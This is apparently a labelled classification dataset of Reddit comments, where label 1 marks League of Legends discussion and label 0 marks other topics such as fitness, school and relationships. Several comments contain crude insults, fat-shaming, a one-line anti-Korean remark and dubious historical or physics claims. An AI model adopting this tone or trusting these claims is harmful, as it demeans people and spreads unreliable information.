0	lol? why? she's right. 11 months out of the year i'm happy to see chubby/fat people in the gym with me working. I'm proud because actually getting up and going to a place where a lot of people are already physically aesthetic is the hardest part.   NY resolutionists can smd though. 90% of them are there for 3 weeks, they do nothing but steal time and gains from me by squatting their hamhocks or wrapping their sausages-for-fingers around weights i need while following some miracle diet that's going to not only help them drop 70 lbs in 2 weeks but it's also SPOT REDUCTION WOOO.
1	You don't need to "main" support to answer this. Basically it all comes down to who you're with, what you're against, and how much pressure the situation causes on you. If we're getting bullied in lane by pokes and harasses with nothing you can really do about it, get a philo stone. If I know that our lane is going to be taking some harass without much kill potential, I'll start with pendant bead two wards, and if the situation calls for it, we can either tough it out for me to get a sightstone, I get pushed out and get a philo and another two or three wards, or we land a lucky first blood double and I can get both.   If we're going to be doing the zoning and pushing, start pendant 3 wards, and based on how early you must go back and the circumstances that caused it, either go straight for the sightstone or work toward a philo and wards.
0	Im probably gonna be downvoted into oblivion, but ill be honest:
0	Why do kids do anything? I had a horrible home life. I was getting my ass kicked daily by my stepfather.   I had spent 8 months being grounded by him for getting a C average.   I ran with the "tough" metal-heads, and I thought it was expected of me to be the shit giver, not the taker.   I was a notorious hot head. Kids would lie to me, and tell me that the kid I picked on did something, just to see me get pissed off and kick his ass. They would stand back and laugh.   I hated life. Was suicidal. I gave absolutely no fucks about what I was doing to other people.   I was already an alcoholic before I made it out of high school.   Take your pick. I had a fucked up life, and I took it out on people who didn't deserve it.   I'm nothing like that today. I changed my life around, and there isn't a day that goes by that I don't think about the horrible shit I did, or the horrible shit I had done to me; but those are all the very things that drive me to be the better person that I am today.
1	If anything the pros are proof it doesn't exist, they all recentely got free smurf accounts from Riot and they all got to Diamond 1 in under 100 matches.
1	Why you no Ban wickd riot? He bad guy! Go afk and not play with team! Do you realize how fucking pathetic you look? Do you really think the world revolves around you? Like seriously, their is already a fucking system in place called the tribunal where players can report others for disrupting the game.  People at that Elo really don't give a fuck when it comes down to it. They play each other everyday and if they found something worthy of a report they'll do it.
0	Pretty sure she's being 100% serious and is giving you obvious signals. Go for her man, ask her out on a date. Do it now, otherwise she'll find another guy in her life to be her Valentine. After all, she's got a good month to go.   Even if there is there's slimmest chance she was joking, you can still respond back seriously and you might still get a date with her. Worst case scenario, you built up your confidence, and you guys can laugh about it on good terms.
1	Upvoted for truth.  Ghostcrawler has nothing to do with any of this.  And most likely he has had VERY little impact on the game in such a short time.  You have to remember that Riot is a fairly large corporation, and has a very different work place environment than what we may think of as normal.  He's still probably just getting caught up on everything going on.   Also keep in mind, he is almost certainly more of an Administrator then someone who actually works on balance of anything directly.  I just hope that he doesn't get the same treatment at Riot he did at Blizzard, where they used him as the public face for people to hate on, in order for the people really making decisions to work in peace.  He is a great mind in the industry, and we should remember that.   While I don't necessarily agree with everything Riot does, balance as a whole has been very well done over the past year.  While change is often slow in coming, and there are still many outliers that need help (Poppy for example) the core of the game is in a great place right now.   You have to also remember that Riot (out of necessity) balances for the professional level most of the time.  But they also have to keep the essence of characters the same.  They don't want to piss off every Poppy main by completely changing her kit and play style, and bringing a champion up to par, while maintaining their individuality is very hard in a game like this.  I don't think it's hard to notice that a large number of the reworked champions have come out extremely strong.  (More recent ones like Kassadin have gone the other way but still it's at least 50%.)   Meta is also important.  Something that looks like an insignificant buff, may suddenly become an OP change with only a slight shift in the meta.  In 6 months we may suddenly see GP be the most OP mid laner in the game, Vel'Koz will be the most banned SUPPORT in the game, and Graves will suddenly make a resurgence.  Not because of buffs to any of them in particular, but because the meta shifts, and changes.
1	Overall a good article, there is one thing which bugs me though:   > The majority of players are doomed to be mediocre. This is a harsh truth but it is very true. Some players are just downright incapable of playing this game and others are just unable to become better. They reach their ceiling too soon so to speak and they can't climb above it no matter what they do.   Yes, obviously a majority of the players is mediocore (definition of mediocore). But it's not true, that they can't become better and climb. While every new player starts at a different mechanical ("talent", experience from other games/activities) and knowledge level and varys in learning speed (which is strongly defined by the amount of experience in similiar activities), everyone is able to become an above average player or even become one of the best players. But the amount of effort someone has to put into achieving that is very different from player to player. For some, who seem to be stuck at their current skill level, it might need a completely different approach when they want to climb higher.
0	As a high school student who has taken several AP, pre-AP, and other college level classes, I can honestly say that I won't be contributing to society in any major way, despite the fact that I'd like to do so. This isn't a laziness thing, as it's moreso a realism thing. Do I have potential to be a world leader? Perhaps (my ROTC instructor thinks I do anyway). But so does everybody else in this world. Now, when I say what I'm about to say does not mean that gifted kids should be entirely ignored. The "average" students need it the most really. You see, as one becomes successful at something, that constant ease of it all becomes mind-numbingly boring (I've experienced it first hand, as I quit my trap shooting team because of this). This is why the "gifted" kids tend to do terrible in college. They never really had to work hard or study like they pretty much require you to do in college. The regulars that may not have had record breaking test scores still do ok at the least because they know how to study and apply themselves. They're the ones who make it through college. They're the ones who actually know what to do with their knowledge. As one of the "gifted" that I've identified, I know I won't be that life-changing guy who found a cure for cancer or actually brought about world peace in world politics, but I'll still contribute if I can.
1	Not necessarily, I just want sites like lolnexus and lolking to be shut down. IIRC, one of the first sites to do so did end up getting shut down, but Riot allows 3rd party companies and partners to handle some user's information and statistics, (obviously not all of it) which I dislike. Yeah, things like lolnexus are very useful and I don't disagree with that, but it can be annoying if I just want to play normal games and not have people criticize me about my build or suddenly become camped in lane because of my rune choices. Unfortunately, I doubt Riot will ever do anything, and I recall some red posts in the past stating their stance on it.   edit: Statistics are nice, I just don't like the fact that I can, and my opponent can, see my runes/masteries/gamesplayed before we even get into the game. It's more useful for ranked, and if anything, shouldn't be available in normal games.
0	I'm a 16 year old who's always made good grades, and has always been heavily invested in their own education (Reading and writing outside of class, even back in middle school).  I've had bad teachers.  I've had good teachers.  The good teachers never called me a "little shit" but I digress.  But I have always found I put a similar amount of effort that my teacher does.  If my teacher respects me and treats me how I deserve to be treated (look at me, being entitled now, deserving things), then I will work harder.  But if my teacher is an entitled little shit, I'm liable to be an entitled little shit right back.
0	I did the same thing hoping to read at the top, "nonsequitur_account" or something.
1	Holy fucking shit this thread is full of people who didn't watch the video.   We can't all wait to hear your opinion on some story fragments you got from misinformed people. [/s]   Stop being dicks to a guy you probably never even heard of before yesterday and most importantly stop judging his current ban on past events.   He was given  the right  to a 3 month trial account,  then he was banned. That's the fucking plot here.   If you agree with the thousands of hive-minded players out there based on your own Google searches, good for you, but you have no more right to judge him than Riot does. They banned the identity of a person from their own game, something that has never been done, not for professional players elo-boosting, or even breaking the terms & conditions and the law to have advantages in-game.   Don't hop on a premade opinion just because it suits you. If you want to make your word count for shit, judge XJ9 after you  form YOUR OWN opinion  based on  YOUR OWN research .
0	You get used to the hairyness eventually, then you just get the odd phantom tickle just like everyone else.   The real bain about hairy legs is that they usually lead to hairy arsehole. Hairy arsehole is a motherfuckinbitch.   I've gotten through entire toilet rolls after a particularly clay-like passing. And it never fails to earn a comment whenever I'm caught in the compromising position of having my shirt rise up my back. Shaving is completely necessary whilst simultaneously absolutely ridiculous. It's not just the act of contorting yourself in-front of a mirror, its the ever-present awareness of the consequences of being walked-in on. Even if you live alone/have locked the doors/are in a steel bunker under ground on the moon. Every peripheral noise is someone about to turn the door handle.   And god-forbid you use the front facing camera on your phone as a mirror.. because you know you're going to be checking and double checking all night that you deleted that video (even though you didn't hit record) in case somehow someone gets to browse your gallery of personal bum-pampering-time vids.
0	This is the trick right here.  Don't look for a girlfriend, look for friends.  Movies make it look like you're gonna just run into the girl out jogging or something, but in real life you meet a girlfriend trough other friends.  Sitting here right now I can't think of a single relationship where the people started dating without being introduced by somebody that was a mutual friend.  More friends = more chances.
0	The Lion king was pretty cool in 3D (they layered everything really well so itwas less jarring in 3D than it could have been) but Beauty and the Beast was  awful  in 3D. During production Belle's character was notorious for being difficult to keep on model, and boy howdy does it show in scenes where she isnt the focus of the shot. I mean, production was super rushed so some cut corners are totally expected, but the big screen (and in 3D!) did not do that movie any favours.
1	Its only for Garena. But what they mean is that you cannot give away champions/skins that you own. There isn't really a way for us to purchase RP for friends besides buying Garena shells for them. I think Garena probably copy pasted that text from somewhere.
1	sorry for you man, but you have to understand lol is full of kids. kids = irrational and unarguable. best way to play is just mute chat or don't talk back. you see those player who go 0/10 and doesn't say a single word in chat? those kids get never banned, because they never say anything.
1	it's more costefficient in the long run, but do you think you can stay alive with a early oracle 100% of the time?   if yes, then you're a Beast!!!
1	I love how first blood is almost a bait now for the enemy, forcing them to use summoners. One game I was supporting and my ad (was not my duo) we both gave there bot lane a kill around 1:25 in game. but we walked back in lane, didn't say much about it, however we had summoners, they didn't and we ended up stomping the lane and win the rest of the game
1	i have this exact same problem, only i play the fuck out of COOP vs AI games (1400+ wins, 60 losses) i cant stand playing people games because i stress out, much more in this one than other games (COD) because of how reliant it is on teamwork to ensure a functional game.   i played my first real game with my RL buddies a few days ago, did WAY better than expected, did some shit i never ever did in a bot game(like warding, i was top lane udyr vs riven, warded the fuck out of the river (always had a ward up on my flank) and even counter jungled their blu and red buffs and warded the enemy jungle.   i felt very good about myself, but i was WAY TOO stressed out the entire time, it was a mixture of excitement and anxiety, but overall was VERY pleased with my gameplay (i keep praising myself, because i fear im terrible from so many bot games)   but i had alot of fun, it wasnt a steam roll, it was fun, i want to play again, but i just cant bring myself to gamble on having a bad game, where if i play a bot game, i KNOW for a fact i will have a good time. it's wierd, ive started playing ARAMs, but they arent nearly that much fun as a bot game to me, they are always onesided from my experience, and pretty much determined at the champ select.
0	It wasn't an ultimatum, it was just like, "hey man, if you wanna do this its cool, but I'll have to go elsewhere".   That's kind of an ultimatum isn't it?   I have no problems with changing if it's something that doesn't affect my interests. That being said it does happen that people get into relationships with people who try to change them into things they are not (I dated a girl who was very needy and didn't like being alone, whereas I'm a reclusive person at times and I very much enjoy my alone time, she tried to change that and it didn't work out in the end). I'm assuming that's the type of thing OP is talking about, not talking about changing eating habits and being a healthier person.
1	Kassadin does not counter leblanc.   I see a lot of mids take scaling ap blues which is a huge mistake vs a strong laner like leblanc because you will just get wrecked.   LB is fairly easy to deal with once you know her ranges and before she gets blue buff. Just farm outside of her range and if she tries to zone you, you can harass her back. The important thing to note about playing vs. leblanc is to not take free damage. If she throws out a q-w combo, hit her back. A lot of people just take the damage like a bitch. If you let yourself get too low you'll be forced to go back or die.   Again the most important thing is to farm. Leblanc will fall off lategame and if you don't allow her to snowball, she will become less and less of a factor.   Nobody really counters leblanc hard, but there are certain strategies that counter lb. She has a very hard time farming so if you can push the wave to her turret with someone who can clear creeps quickly (morgana, sion, orianna, morde, etc.), she will be unable to farm properly or gank sidelanes.   If you're really having trouble, get a null-magic and a bunch of health potions on your way back.
0	Right, but either way, guns are the source of this.   Gun+ammo=potential for death. Do the math.   Only in the US is this even an issue. Only criminals need guns, so let's take them off the streets and out of houses.
1	THIS GUY SHOULD GET GOLD. It's all true here. I want to add that marksman form need AD + Attack Speed , Mega Gnar need's ARMOR + HP + MR . And the biggest problem , there is not much items well compared for this both forms. If u go marksman , M.Gnar will be a little surprise , if u go full ARMOR HP AND MR little gnar will be shit = no kills , no plays etc.
0	I'm posting this on a throwaway as some know my main Reddit username.   My senior year of high school, I was awarded a $1,000 scholarship. Since I was also headed to a state-ran university, I also was granted the [Millennium Scholarship]( My freshman year at college was fantastic because I paid nothing for books or tuition.   However, before my sophomore year, Nevada decides to limit the Millennium Scholarship. Instead of paying for all of your credits in a semester, it'll only pay for twelve credits a semester. Fuck, I'm taking eighteen credits a semester because I have a double major and I want to get out of here as soon as possible. To pay for what the Millennium Scholarship didn't cover, I had to get a part-time job. Thankfully, I got a part-time job at an amazing company as I uncovered.   Why? If you we're a full-time employee, they would pay for $6,000 worth of your expenses each year as long as you pass with a "C+" or higher. By junior year, I got a full-time position. At the end of every semester, I would fax all of my information in. At this point in time, the Millennium Scholarship didn't show that you have a scholarship on your tuition fees. It just shows the amount it paid for and the date it was paid. That's it.   What ended up happening is my company would pay me for whatever the total bill cost regardless. Example: I would pay $2000 a semester. My scholarship would cover up to $960 a semester, so I would pay $1040. My company would pay me for the entire $2000. I was making an additional grand a semester which is like a million dollars to a college kid with no real depth or knowledge on how money works. I paid off my debt, bought a new car ( putting me further into debt ) and bought me shit I didn't need.   So yes, I went to an American university and got paid the last two years to go to school.
1	In my opinion Seraph never got to play to his full potential because of how CLG plays their games. Seraph was always at a deficit from champ select, picking carry type champions in every role EXCEPT top lane.   Then it was usually CLG who would initiate a lane swap so doublelift/aphro was at the advantage while Seraph suffered the most.   I have been watching this guy in soloq through op.gg and I must say he's among he's really strong mechanically and decision making wise, but only if he's allowed to have a 1v1 lane and get ahead.   I appreciate the fact that in this meta top laners usually are deprived of getting ahead early due to all these lane swaps etc. but most teams accommodate and adjust their playstyle accordingly, CLG just seem to forget they have a top laner and just focus all their resources on getting doublelift/Link fed, which is fine as they are the carries but I think they overdo it.
1	Pretty much what I would say if I would stop being lazy and actually type out what I think. Now I don't have to though. Yay.
1	Firstly, many of those victories were under leaders who were not actually french (Napoleon was born in Italian Corsica).   Secondly, Vietnam is like the only country to have fought in at least one major war and to have never lost.   Thirdly the colours red white and blue are used by so many countries that this point is so stupid. UK, Russia, Fiji, Australia, Iceland, Thailand, Taiwan (RoC), Costa Rica, Cuba, Netherlands, Croatia, Czech Rpbc, Dominican Rpbc, Laos, Liberia, Luxembourg, New Zealand, Nepal, North Korea, Norway, Panama, Paraguay, Samoa, Sabah, Slovakia and Slovenia all use the RWB colour scheme IN ADDITION to France and considering that America was originally a colony of England it is highly unlikely that they took those colours ESPECIALLY since, and this is the most important point   France's revolution, which resulted in the current flag pattern, happened AFTER the American revolution. In fact, many historians believe that the American revolution was one of the causes of the French revolution since it planted the idea of usurping an oppressive gov't.
1	Edit: 3rd page and 21 upvotes, I nearly dropped my phone! Thanks for the internet fame all!   Edit: Grammar.
0	Asian here. My family has known this other Asian family since they first emigrated to the states. Mom, pop, 3 sons. They were broke as fuck. Granted, we weren't even close to rich either but we gave them basic amenities like a little tv so they'd have something to watch. Fast forward a few decades- now they own a thriving restaurant, rent out a few houses, and I'm pretty sure they have a business back in Asia as well. Each son has gone to college, they all have hondas and BMWs and motorcycles. Mom isn't flashy- she's wears the same clothes, same hair as she's always had. They're hard working and down to earth, they always have been.   I guess it just depends on the people and how badly they want it.
1	As an ex-Moderator of the LeagueofLegends subreddit I can assure you that the Mods can't issue shadowbans. That is a decision that is made entirely by the reddit admins and is sitewide, not restricted from a single subreddit.   There is a (albeit strict) ratio that anyone posting their content must maintain and I believe that ratio is 9:1 posts in the community for every piece of their content they upload.
1	hate the Koreans   Worst
1	Maybe a slight reference to the Japanese swordsmiths Masamune and Muramasa? Masamune's swords are often said to be the counterpart to Muramasa's swords in fiction, Muramasa's swords said to thirst for blood and violence while Masamune's swords are usually described as the mark of an internally peaceful and calm warrior, in this case Yone being a reference to warriors attributed to using Masamune's swords while Yasuo being a reference to warriors attributed to using Muramasa's swords.
0	This is my life in
1	Dota 2 is being made by Valve, not Blizzard, and no royalties are being paid to Blizzard since the only intellectual property they owned in the Dota series was the art assets from W3 that DotA used: art assets which Valve didn't use. Any reference to W3 is now gone.
0	I can't show a credible source because google only shows WebMD, DoctorOz and sites with nutritional facts whilst denying other proven healthy habits. I learned it in Biology.   The only think I can link is:
1	A projectile for the purposes of Wind Wall is a game object that lives in the world for some time moving along a pre-defined path. This all sounds complicated, but it tends to be much simpler in practice than in theory. Enchanted Crystal Arrow is a missile. Fin... er... Lux Ult is not a missile.  Varus basic attack is a missile.  Kayle basic attack, not a missile.  Ryze Q and E are missiles. Ryze W is not a missile.  Maokai Sapling in flight is a missile. Maokai sapling while running at someone is not a missile.  Note that missiles with extreme arcs which take them off the screen, like Kog'Maw ult or Ziggs ult are unblockable, because they travel well over the wall." this is what he said in the forums
0	This Advice Mallard is misleading: it's great advice for both genders, not just men talking to women. Nothing makes me feel as irritated & hopeless than when I'm trying to explain how a situation at work made me feel & my girlfriend interrupts, telling me what I should do to make the situation better / not worse. Conversely, there are times where she needs to feel supported emotionally, even in her sadness. The "advice" mechanism is I think an attempt to make the other person happier, when what they're really seeking is support.
0	I finally have a relevant story for you all. Ok, me and my buddy and our dates were in Downtown Indianapolis 4 years ago. Around Christmas.  This guy confronts us saying his car is in the shop and has a broken rim and his debit card got locked and his dad is sick and he works at Purdue as a floor scrubber ect ect. My buddy gives him like 7 dollars cash and we go about our way. I assumed he was a pan - handler to begin with but oh well.   Forward to this year. Me and my Fiancé were again in downtown Indy. A guy confronts us. Starts In with the same story and I realize pretty shortly he is THE SAME GUY!! I politely tell him no and immediately tell my Fiancé about the night 4 years ago and made a status on Facebook tagging the 3 that were with me that night. They all remember him and other friends of mine have had his "story" as well.
1	It's not just black cleaver, many ap items were made cheaper but less effective, making ap less strong in the late game, athenes lost 30 ap, dfg was made weaker for most champs, and a lot of people have higher mr than before in the late game, as a result of Aegis's upgrade, Runic Bulwark.   I genuinely don't hate on riot and it's pre season for a reason, it's alright tbh, but I do think it will be harder to make ap carry work late game with the new changes.
0	I agree that there should be a middle ground. My parents never talked about money around us when we were kids and I thought money came easily. I even saw a video of me on Christmas saying "that's it?" After I opened all my presents.  I was disgusted with myself. I'm glad I grew out of that quick. And from my senior year, entering college, my parents started to tell me how it's really hard to send me to college and told me how they don't know what they're going to do. It makes me feel guilty for going to college and wanting a better life for myself. Both my parents and I have worked on getting me to college since I was a kid. We are making it work now though. They haven't told me the details but they said they figured something out to make it easier on them. Money is a touchy subject. And I think perhaps that middle ground is something like making your children work for their allowance or something like that.
0	Aside from pregnancy (which is obviously going to make you gain weight) and abnormal growths, you can solve those problems by making changes to your diet. There are absolutely things you can do to relieve constipation and fluid retention, if you just make a change. I'm not saying people are somehow "required" to make that change or anything. As far as I'm concerned, people can live how they want, because it doesn't really impact most people at all how big or small other people are (human rights and all that). But that doesn't change the fact that other than pregnancy and growths, the only thing stopping you from making changes to your body is your own motivation to do so, or lack thereof.   I think a big reason for the rage on this topic (other than people just loving to hate each other) is about the people who insist that: people of different weights should feel bad for making them self conscious; everyone should tell them how attractive they are, regardless of their physical appearance; people who have made lifestyle changes to become healthier are somehow lesser humans because they weren't satisfied with their body. Personally, I haven't really met any of these types of people in real life, and I know they're the vocal minority, so I just figure "live and let live".
1	Utility ? That's like saying "
0	Right. Well. This could have been avoided if libertyerp would have phrased it properly rather than stating a rule, and then nullifying it (as you stated).   However, in defence of my previous comment, I will point out that I inferred OP simply misspoke when s/he typed the offending phrase. What I assume they meant was something like this: "Except in the cases of cheating and violence, I believe that 'until death do us part' should be taken literally."
1	What's ridiculous is how many people are giving MLG/Riot the benefit of the doubt.   It makes absolutely no sense that any team would publicly talk about how they are going to split prizes---especially when in terms of motivation, both teams have incentive to win 1st place more than 2nd place.   Collusion and/or prize splitting agreements happen with teams who are still seeding or in the lower brackets, to increase their chances of gaining money. The EG + TSM collusion accusation in Dreamhack 2011 had way more evidence.  Such collusion or prize splitting doesn't happen between 1st and 2nd place teams.
1	Snake is as good as King and have much more potential in long term, considering they are very young (fan2fan and Flandre, adc and top, are 15 y.o). Not to mention that PDD is part-time coaching Snake, dude might be somewhat lazy for a pro player, but hes very smart and experienced.   Snake right now is as good as King, if not better, im not sure since ivent seen them lately, but their top laner was MVP of last LSPL split, a monster in top lane, 600LP in KR challenger, totally carry-type which you can ban out all his champions (fizz-yasuo-riven-jax-lissandra and the patch champions). SNake in long term will have more impact than King IMO.   EP is a team that was just a step behind King-Snake in the past months, but they were very good aswel, showed that deserve to be in LPL, mostly their jungler, who is the most skilled mechanically leesin ive ever seen and is somewhat experienced, played lpl with YG in s3. The thing is, They acquired STYZ after he was banned in LGD, and STYZ was banned for 6 months, which means that in december his ban will be lift already and a top5 adc in China will be back to competitive scene. Which is great, because EP's adc was the worst member in the team. EP also has a hell lot of potential in long term, Mid-Top showed to be good enough for lpl, Jungler-styz showed to be top5 in their position and they have good environment, including a great sister team to practice. Their sister team will try to qualify for LPL in a qualifer tournaments after worlds, they might do it or not, they are ok overall but have a absolute monster top laner, probably top5 in China like Snake's Flandre.   Considering current level these teams are obviously lpl and snake-king could any day be top4 taking games out of edg-shrc. COnsidering long-term potential, these 3 have potential to become a top3 teams in the scene.   After EP in lspl, the best team is WOA which has 3 good players but the team isnt actually big deal, they will probably get regalated if qualify for lpl. After WOA, no team is actually top8 teams in the scene, BUT the thing is that many players are lpl level. Many players could be stars in the scene even if their team are not that great. Weiless-Cola-Diangun showed it, they werent even top2 in their position when they played lspl (earlier s4) and still did amazingly in LPL, i can only imagine what Cherish-300-eimi-V and these top lspl players in that time would be in LPL if they qualified, they would be carrying their teams to worlds right now. In these lspl split that just ended is no different, there are many players from mid-table teams that would be great in LPL.   After EP-King-Snake, the best non-lpl teams are 2 amateur teams, that arent even in LSPL, they just play online tournaments and will try to qualify for LSPL for season 5.  They are EDG.f (edg secondary team, formed 2-3 months ago) and Team MD.   EDG.f not just has the same environment from EDG, inlcuding coaches, pc, practice partners (including korean teams) but also are a young team with 2 korean sololaners. Baeme (famous kr challenger, one of faker's rival' and brother of daydream) and the toplaner which is known as 'ray', who IMO is the best player in the team. EDG.f  showed to be insane in their first tournament with 2-3 months of practice, mostly Their toplaner and their jungler. They took games off King, 2-0ed YG easily and showed amazing mechanics. This team hard to imagine that wont be in LPL until late s5, they still have to qualify to LSPL, play LSPL and then qualify for LPL, even tho they look like a bottom lpl team already even being so new, at least better than yg-we-we.a.   MD is a bizarre team (better than edg.f) that was made by only-challenger players and in the past 3-4 months took games and won full bo3-5 series against SEVERAL lpl teams. I really mean SEVERAL, probably ALL them, took games from edg, omg, shrc, 2-0ed we.a and yg in xcs and many more impressive results. Their midlaner is the #1 in chinese challenger (Angelbeats) and  is probably better than any midlaner in this lspl that just ended. MD would probably be as good or better than EP in lspl and certainly are a lpl level team. The thing is, like EDG.f they will only be able to play in LPL in late s5 considering they arent even in lspl. UNLESS they buy a spot.   Besides MD-EDG.f-King-SNake-EP, there are also good-promissing teams like Ray Union (who 2-0ed SHRC and 2-0ed lgd twice, had many other impressive results aswel), WOA (as i said above), Gamtee (i never like them that much, not really an entertaining team to watch, but they get good results, including taking games from omg-edg), QQvip  (AKA Hangongclub, biggest Crossfire team in the world, they failed to qualify for LSPL even tho they were as good as snake in the qualifiers), vgs (were formed to be the challenger allstar team, with 4 lpl level players, but Tabe is a terrible coach and swapped 1 player that fucked the team).   All these other promissing teams (ray-woa-gamtee-qqvip-vgs) probably will never be top table lpl teams or anything like that, but they are an improvement compared to YG (not compared to we.a, we.a is playing much better lately than yg or we main team). Even if they dont reach LPL as a team, they have 2-4 players in their roster than are lpl level players, i know them very well.     I might be proved wrong someday, but my theory is that challenger-amateur teams in China are as good if not better than challenger-amateur teams in Korea, considering the size of playerbase and the terrible influx talent happening in China, stacking talent in the lower leagues instead of pushing them into top competition. At the moment, i like to follow them more than LPL, is more entertaining to watch teams rising and surprising likes of EDG-SHRC than anything else.
1	reddit downvotes threads over time so old posts don't stay at the top for forever.   as for how to keep your cool in ranked games, do you find yourself getting mad at people in normals? if so, it will be very hard for you to just have fun in ranked games. i personally play ranked games similarly to how i play normals. the only major difference is i try to stick to characters and positions I'm good at (mainly play support or ad carry, occasional jungle, have around 3 consistantly good champs for each position).   In both normals and ranked games I hold very little to no expectations for my teammates. I play support and never assume my ad carry will know what i want him to do, and don't even expect for him to win an advantageous lane. This way I'm usually pretty happy with my teammate when he does well, and not disappointed when he feeds.   If someone on your team is flaming, you have two options; muting him or standing up to him. I personally prefer to say that his flaming isn't helping (usually saying "saying [his flaming quote] isn't going to help anyone win or do better") ONLY if the flaming isn't directed towards you. If the flaming is directed towards you, just mute him and forget he said anything. I choose to say something when the flaming is directed towards someone else because it helps keep the person being flamed from going on tilt and making more mistakes. I don't defend myself because it is likely to start a big argument that involves the two of you. this will put many people on tilt as well as distract them from the game, almost guaranteeing a loss.   2 last things i try to do to keep my cool and have fun while playing ranked. First, tell people on either team who do something good/cool that his move looked really cool. just helps lighten the very serious mood involved in ranked games. second, don't play more than 3 games in a row of ranked. every time i stay to play a 3rd or 4th ranked match, one of two things happen. either i lose a 3rd or 4th straight game and get really mad at all my teammates and ruin my day, or i lose the winning streak i had just shy of some elo goal i set. and if its the latter, i start to get mad and reque because i was sooooooo close and want to get it again. after, i start getting mad at every mistake because i really want that elo.
1	Tell ya a story; more than a year ago I was the average bronze player that couldn't win because his team was dragging him down. I just played with my friends, had fun, but when it came to solo queue, I just couldn't do any better. At the time I was watching streams and to be precise, I was watching Ocelote and Bob often. They were platinum players at that time, the highest rank. Watching them over and over again motivated me to gain elo , climb , improve, just so I could play a game with the guy who has a lot of viewers. It may seem stupid, but people get motivation from less. Now I'm proud to say that I reached my goal and got to where I wanted to get at that time. It makes you very happy and acomplished.
1	I am going to have to disagree with your video and here is why:   I would like to point out that this is a game to enjoy and have fun playing before the idea of becoming a better player. The simple fact is killing an enemy champion is a lot more fun then CSing or jungling. Those are meant for higher level play and no one should worry about that before level 20. Level 20 is the point of the game that most players understand how to play the game and usually have a champ that they are good with. This is the time that they need to start improving their play. This is also the time that the player is almost max on the masteries and can now start to buy their level 3 runes. I have played with a few first time very low skill level players that have no idea what items to buy, how to buy items, how to use skills and how to play any sort of meta.   My first time trying to teach someone with a level 5 account to play, I tried to teach him about the meta and the role of the champion that he picked. That part he understood, somewhat. I then tried to teach him about CSing and harassing in lane. This was not something he understood at all. I realized that we was not doing a lot of damage and saw that he had not bought any items. The simple fact of teaching someone new to worry about CS is just not needed. There are too many other things that they need to learn.   Example: You don't want to teach a kid that has never rode a bike about the concept of correctly picking a gear to be in when he still has training wheels on. Just let them learn how to ride it and get balance, then upgrade their bike.
0	Actually, football was developed as a game in the late 1880s in upstate New York, and slowly grew and became very popular, with professional teams being founded as far back as 1892.  The first televisions weren't invented until the 1910's, weren't commercially available until the 1920s, and weren't as widespread in popularity as we think of them until the 1950s.  Even then, ads were used sparingly, with companies sponsoring entire shows instead of buying 15 seconds of ad time in between sections of a show.  The first true ad as we think of them today appeared in 1941, and was a 10-second ad for a Japanese watch company.
0	Everyone sees posts like this and hates on feminists/feminism but the fact of the matter is that "man hating women" are extremists and the opposite of what feminism is meant to accomplish. Dislike towards either gender is moronic bias. Feminism is about equality, it's about women being seen as equal beings to men in their rights. People take the few outspoken faux-feminist extremists and choose them to represent feminism as a whole but that's like saying the Westboro Baptist Church represents Christianity as a whole. Most men feel threatened by feminism because it's hard for men to see the millions of small inequalities we hold in our culture and society until you take an opposite point of view. I am male and have learned and seen a lot of things that have expanded my horizons. The sad thing is that I may have agreed with OP some years ago. Stop feeling threatened by the idea of equality and help work towards it.
1	I think she's got a really fun playstyle, probably one of my favorites. I actually like to get a Youmuu's Ghostblade really early, as I found myself unable to chose between BC and Mallet, for the penetration or sticking-power. I decided to go early Youmuu's and it has actually been working pretty well. It also gives her attack speed, which goes VERY well with her early IMO. I feel like if you can stick to your lanemate, then you can really dish out some serious damage early on.   I don't really like Frostborn Gauntlet, as I feel like she doesn't do much with the AP, and Frozen Mallet is a much better choice. I also haven't tried Triforce (because I always build FM), but that's mainly just because I'm really unlucky with the procs.   I feel the key is harassing early with Excessive Force, but next time I'm going to try maxing W first to see how that goes.   I don't actually get BT on her; I never really have room for it. I normally go Youmuu's, BC, GA or Warmogs, maybe LW. If I don't get Ninja Tabi, I like to get Zephyr for the tenacity, and the other stats go really well on her too. I like Bulwark for the tankiness, especially since I can afford it much sooner than the support. Haven't tried it but I think Randuin's would be sick, since she has to dive in the middle of the enemy team.   I feel like vs Cho-Style champs, you have to go for a kill pre-6 to establish a lead, and make sure not to fall behind in CS. I don't go sustain to beat them; I either go Doran's or Brutalizer to smash early.   I also want another skin for her, cause I don't like the Neon one.
1	Kind of. Here's a more in-depth look if you're interested.   Whenever you see references to speed (c) in physics, you're seeing a denotation for the speed of light (3.0x10^8 m/s). It's impossible to move at the speed of light, let alone to "always move through spacetime at the same speed (c)" or "faster through space [than (c)]." The reason we can measure the speed of light is because light  does  traverse time. When you see references to light-minutes and light-years, that's the time it would take light to travel the given distance--making light-years a measure of distance.   So if a star is one light-year away, it would take one year for that star's light to reach us, meaning the star is about 10,000,000,000,000 (1.0x10^13 or ten trillion) kilometers from us. The closest star to our sun, Proxima Centauri, is roughly 4 light-years away, about 40,000,000,000,000 (4.0x10^13 or forty trillion) kilometers. To put that number into perspective, the sun is roughly eight light-minutes away from us at about 150,000,000 (1.5x10^8 or 150 million) kilometers, and the moon is roughly 1.3 light-seconds away at about 385,000 (3.85x10^5 or 385 thousand) kilometers.   The reason we can measure these distances? Because light is bound by time, the same as the rest of us.   Special relativity, then, is concerned with the interaction not between light and time but between space (distance, measured with the speed of light) and time. You're right in that it's a sort of compensation; it's a compensation that occurs because of a specific physical law called the  Lorentz transformation, . To put it simply, when one side is altered, so, too, is the other side affected.   But that doesn't tell you why we can't go faster than the speed of light. The answer, my friend, is Einstein's mass-energy equivalence E=mc^2 where E is energy, m is mass, and c is the speed of light. Here we see energy as a function of mass multiplied by the speed of light squared. We all know that heavier objects require more energy to move. Well, thanks to Einstein's equation, we can better understand how [mass itself]( is impacted by energy and speed as you approach the speed of light.   The very short of it is that mass increases as speed increases, and the energy needed to maintain and exceed that speed then increases asymptotically right along with it. As you approach the threshold to the speed of light, any object with mass will be nearly incalculably massive (note: massive here is more or less your conception of weigh, not size) and will require nearly incalculable amounts of energy to maintain and exceed its speed. Therefore, nothing with mass may reach the speed of light because at the threshold point both mass and energy become infinite.   The reason light can conquer the threshold is because light particles do not have mass and thus are not constrained to the asymptotic relationship.
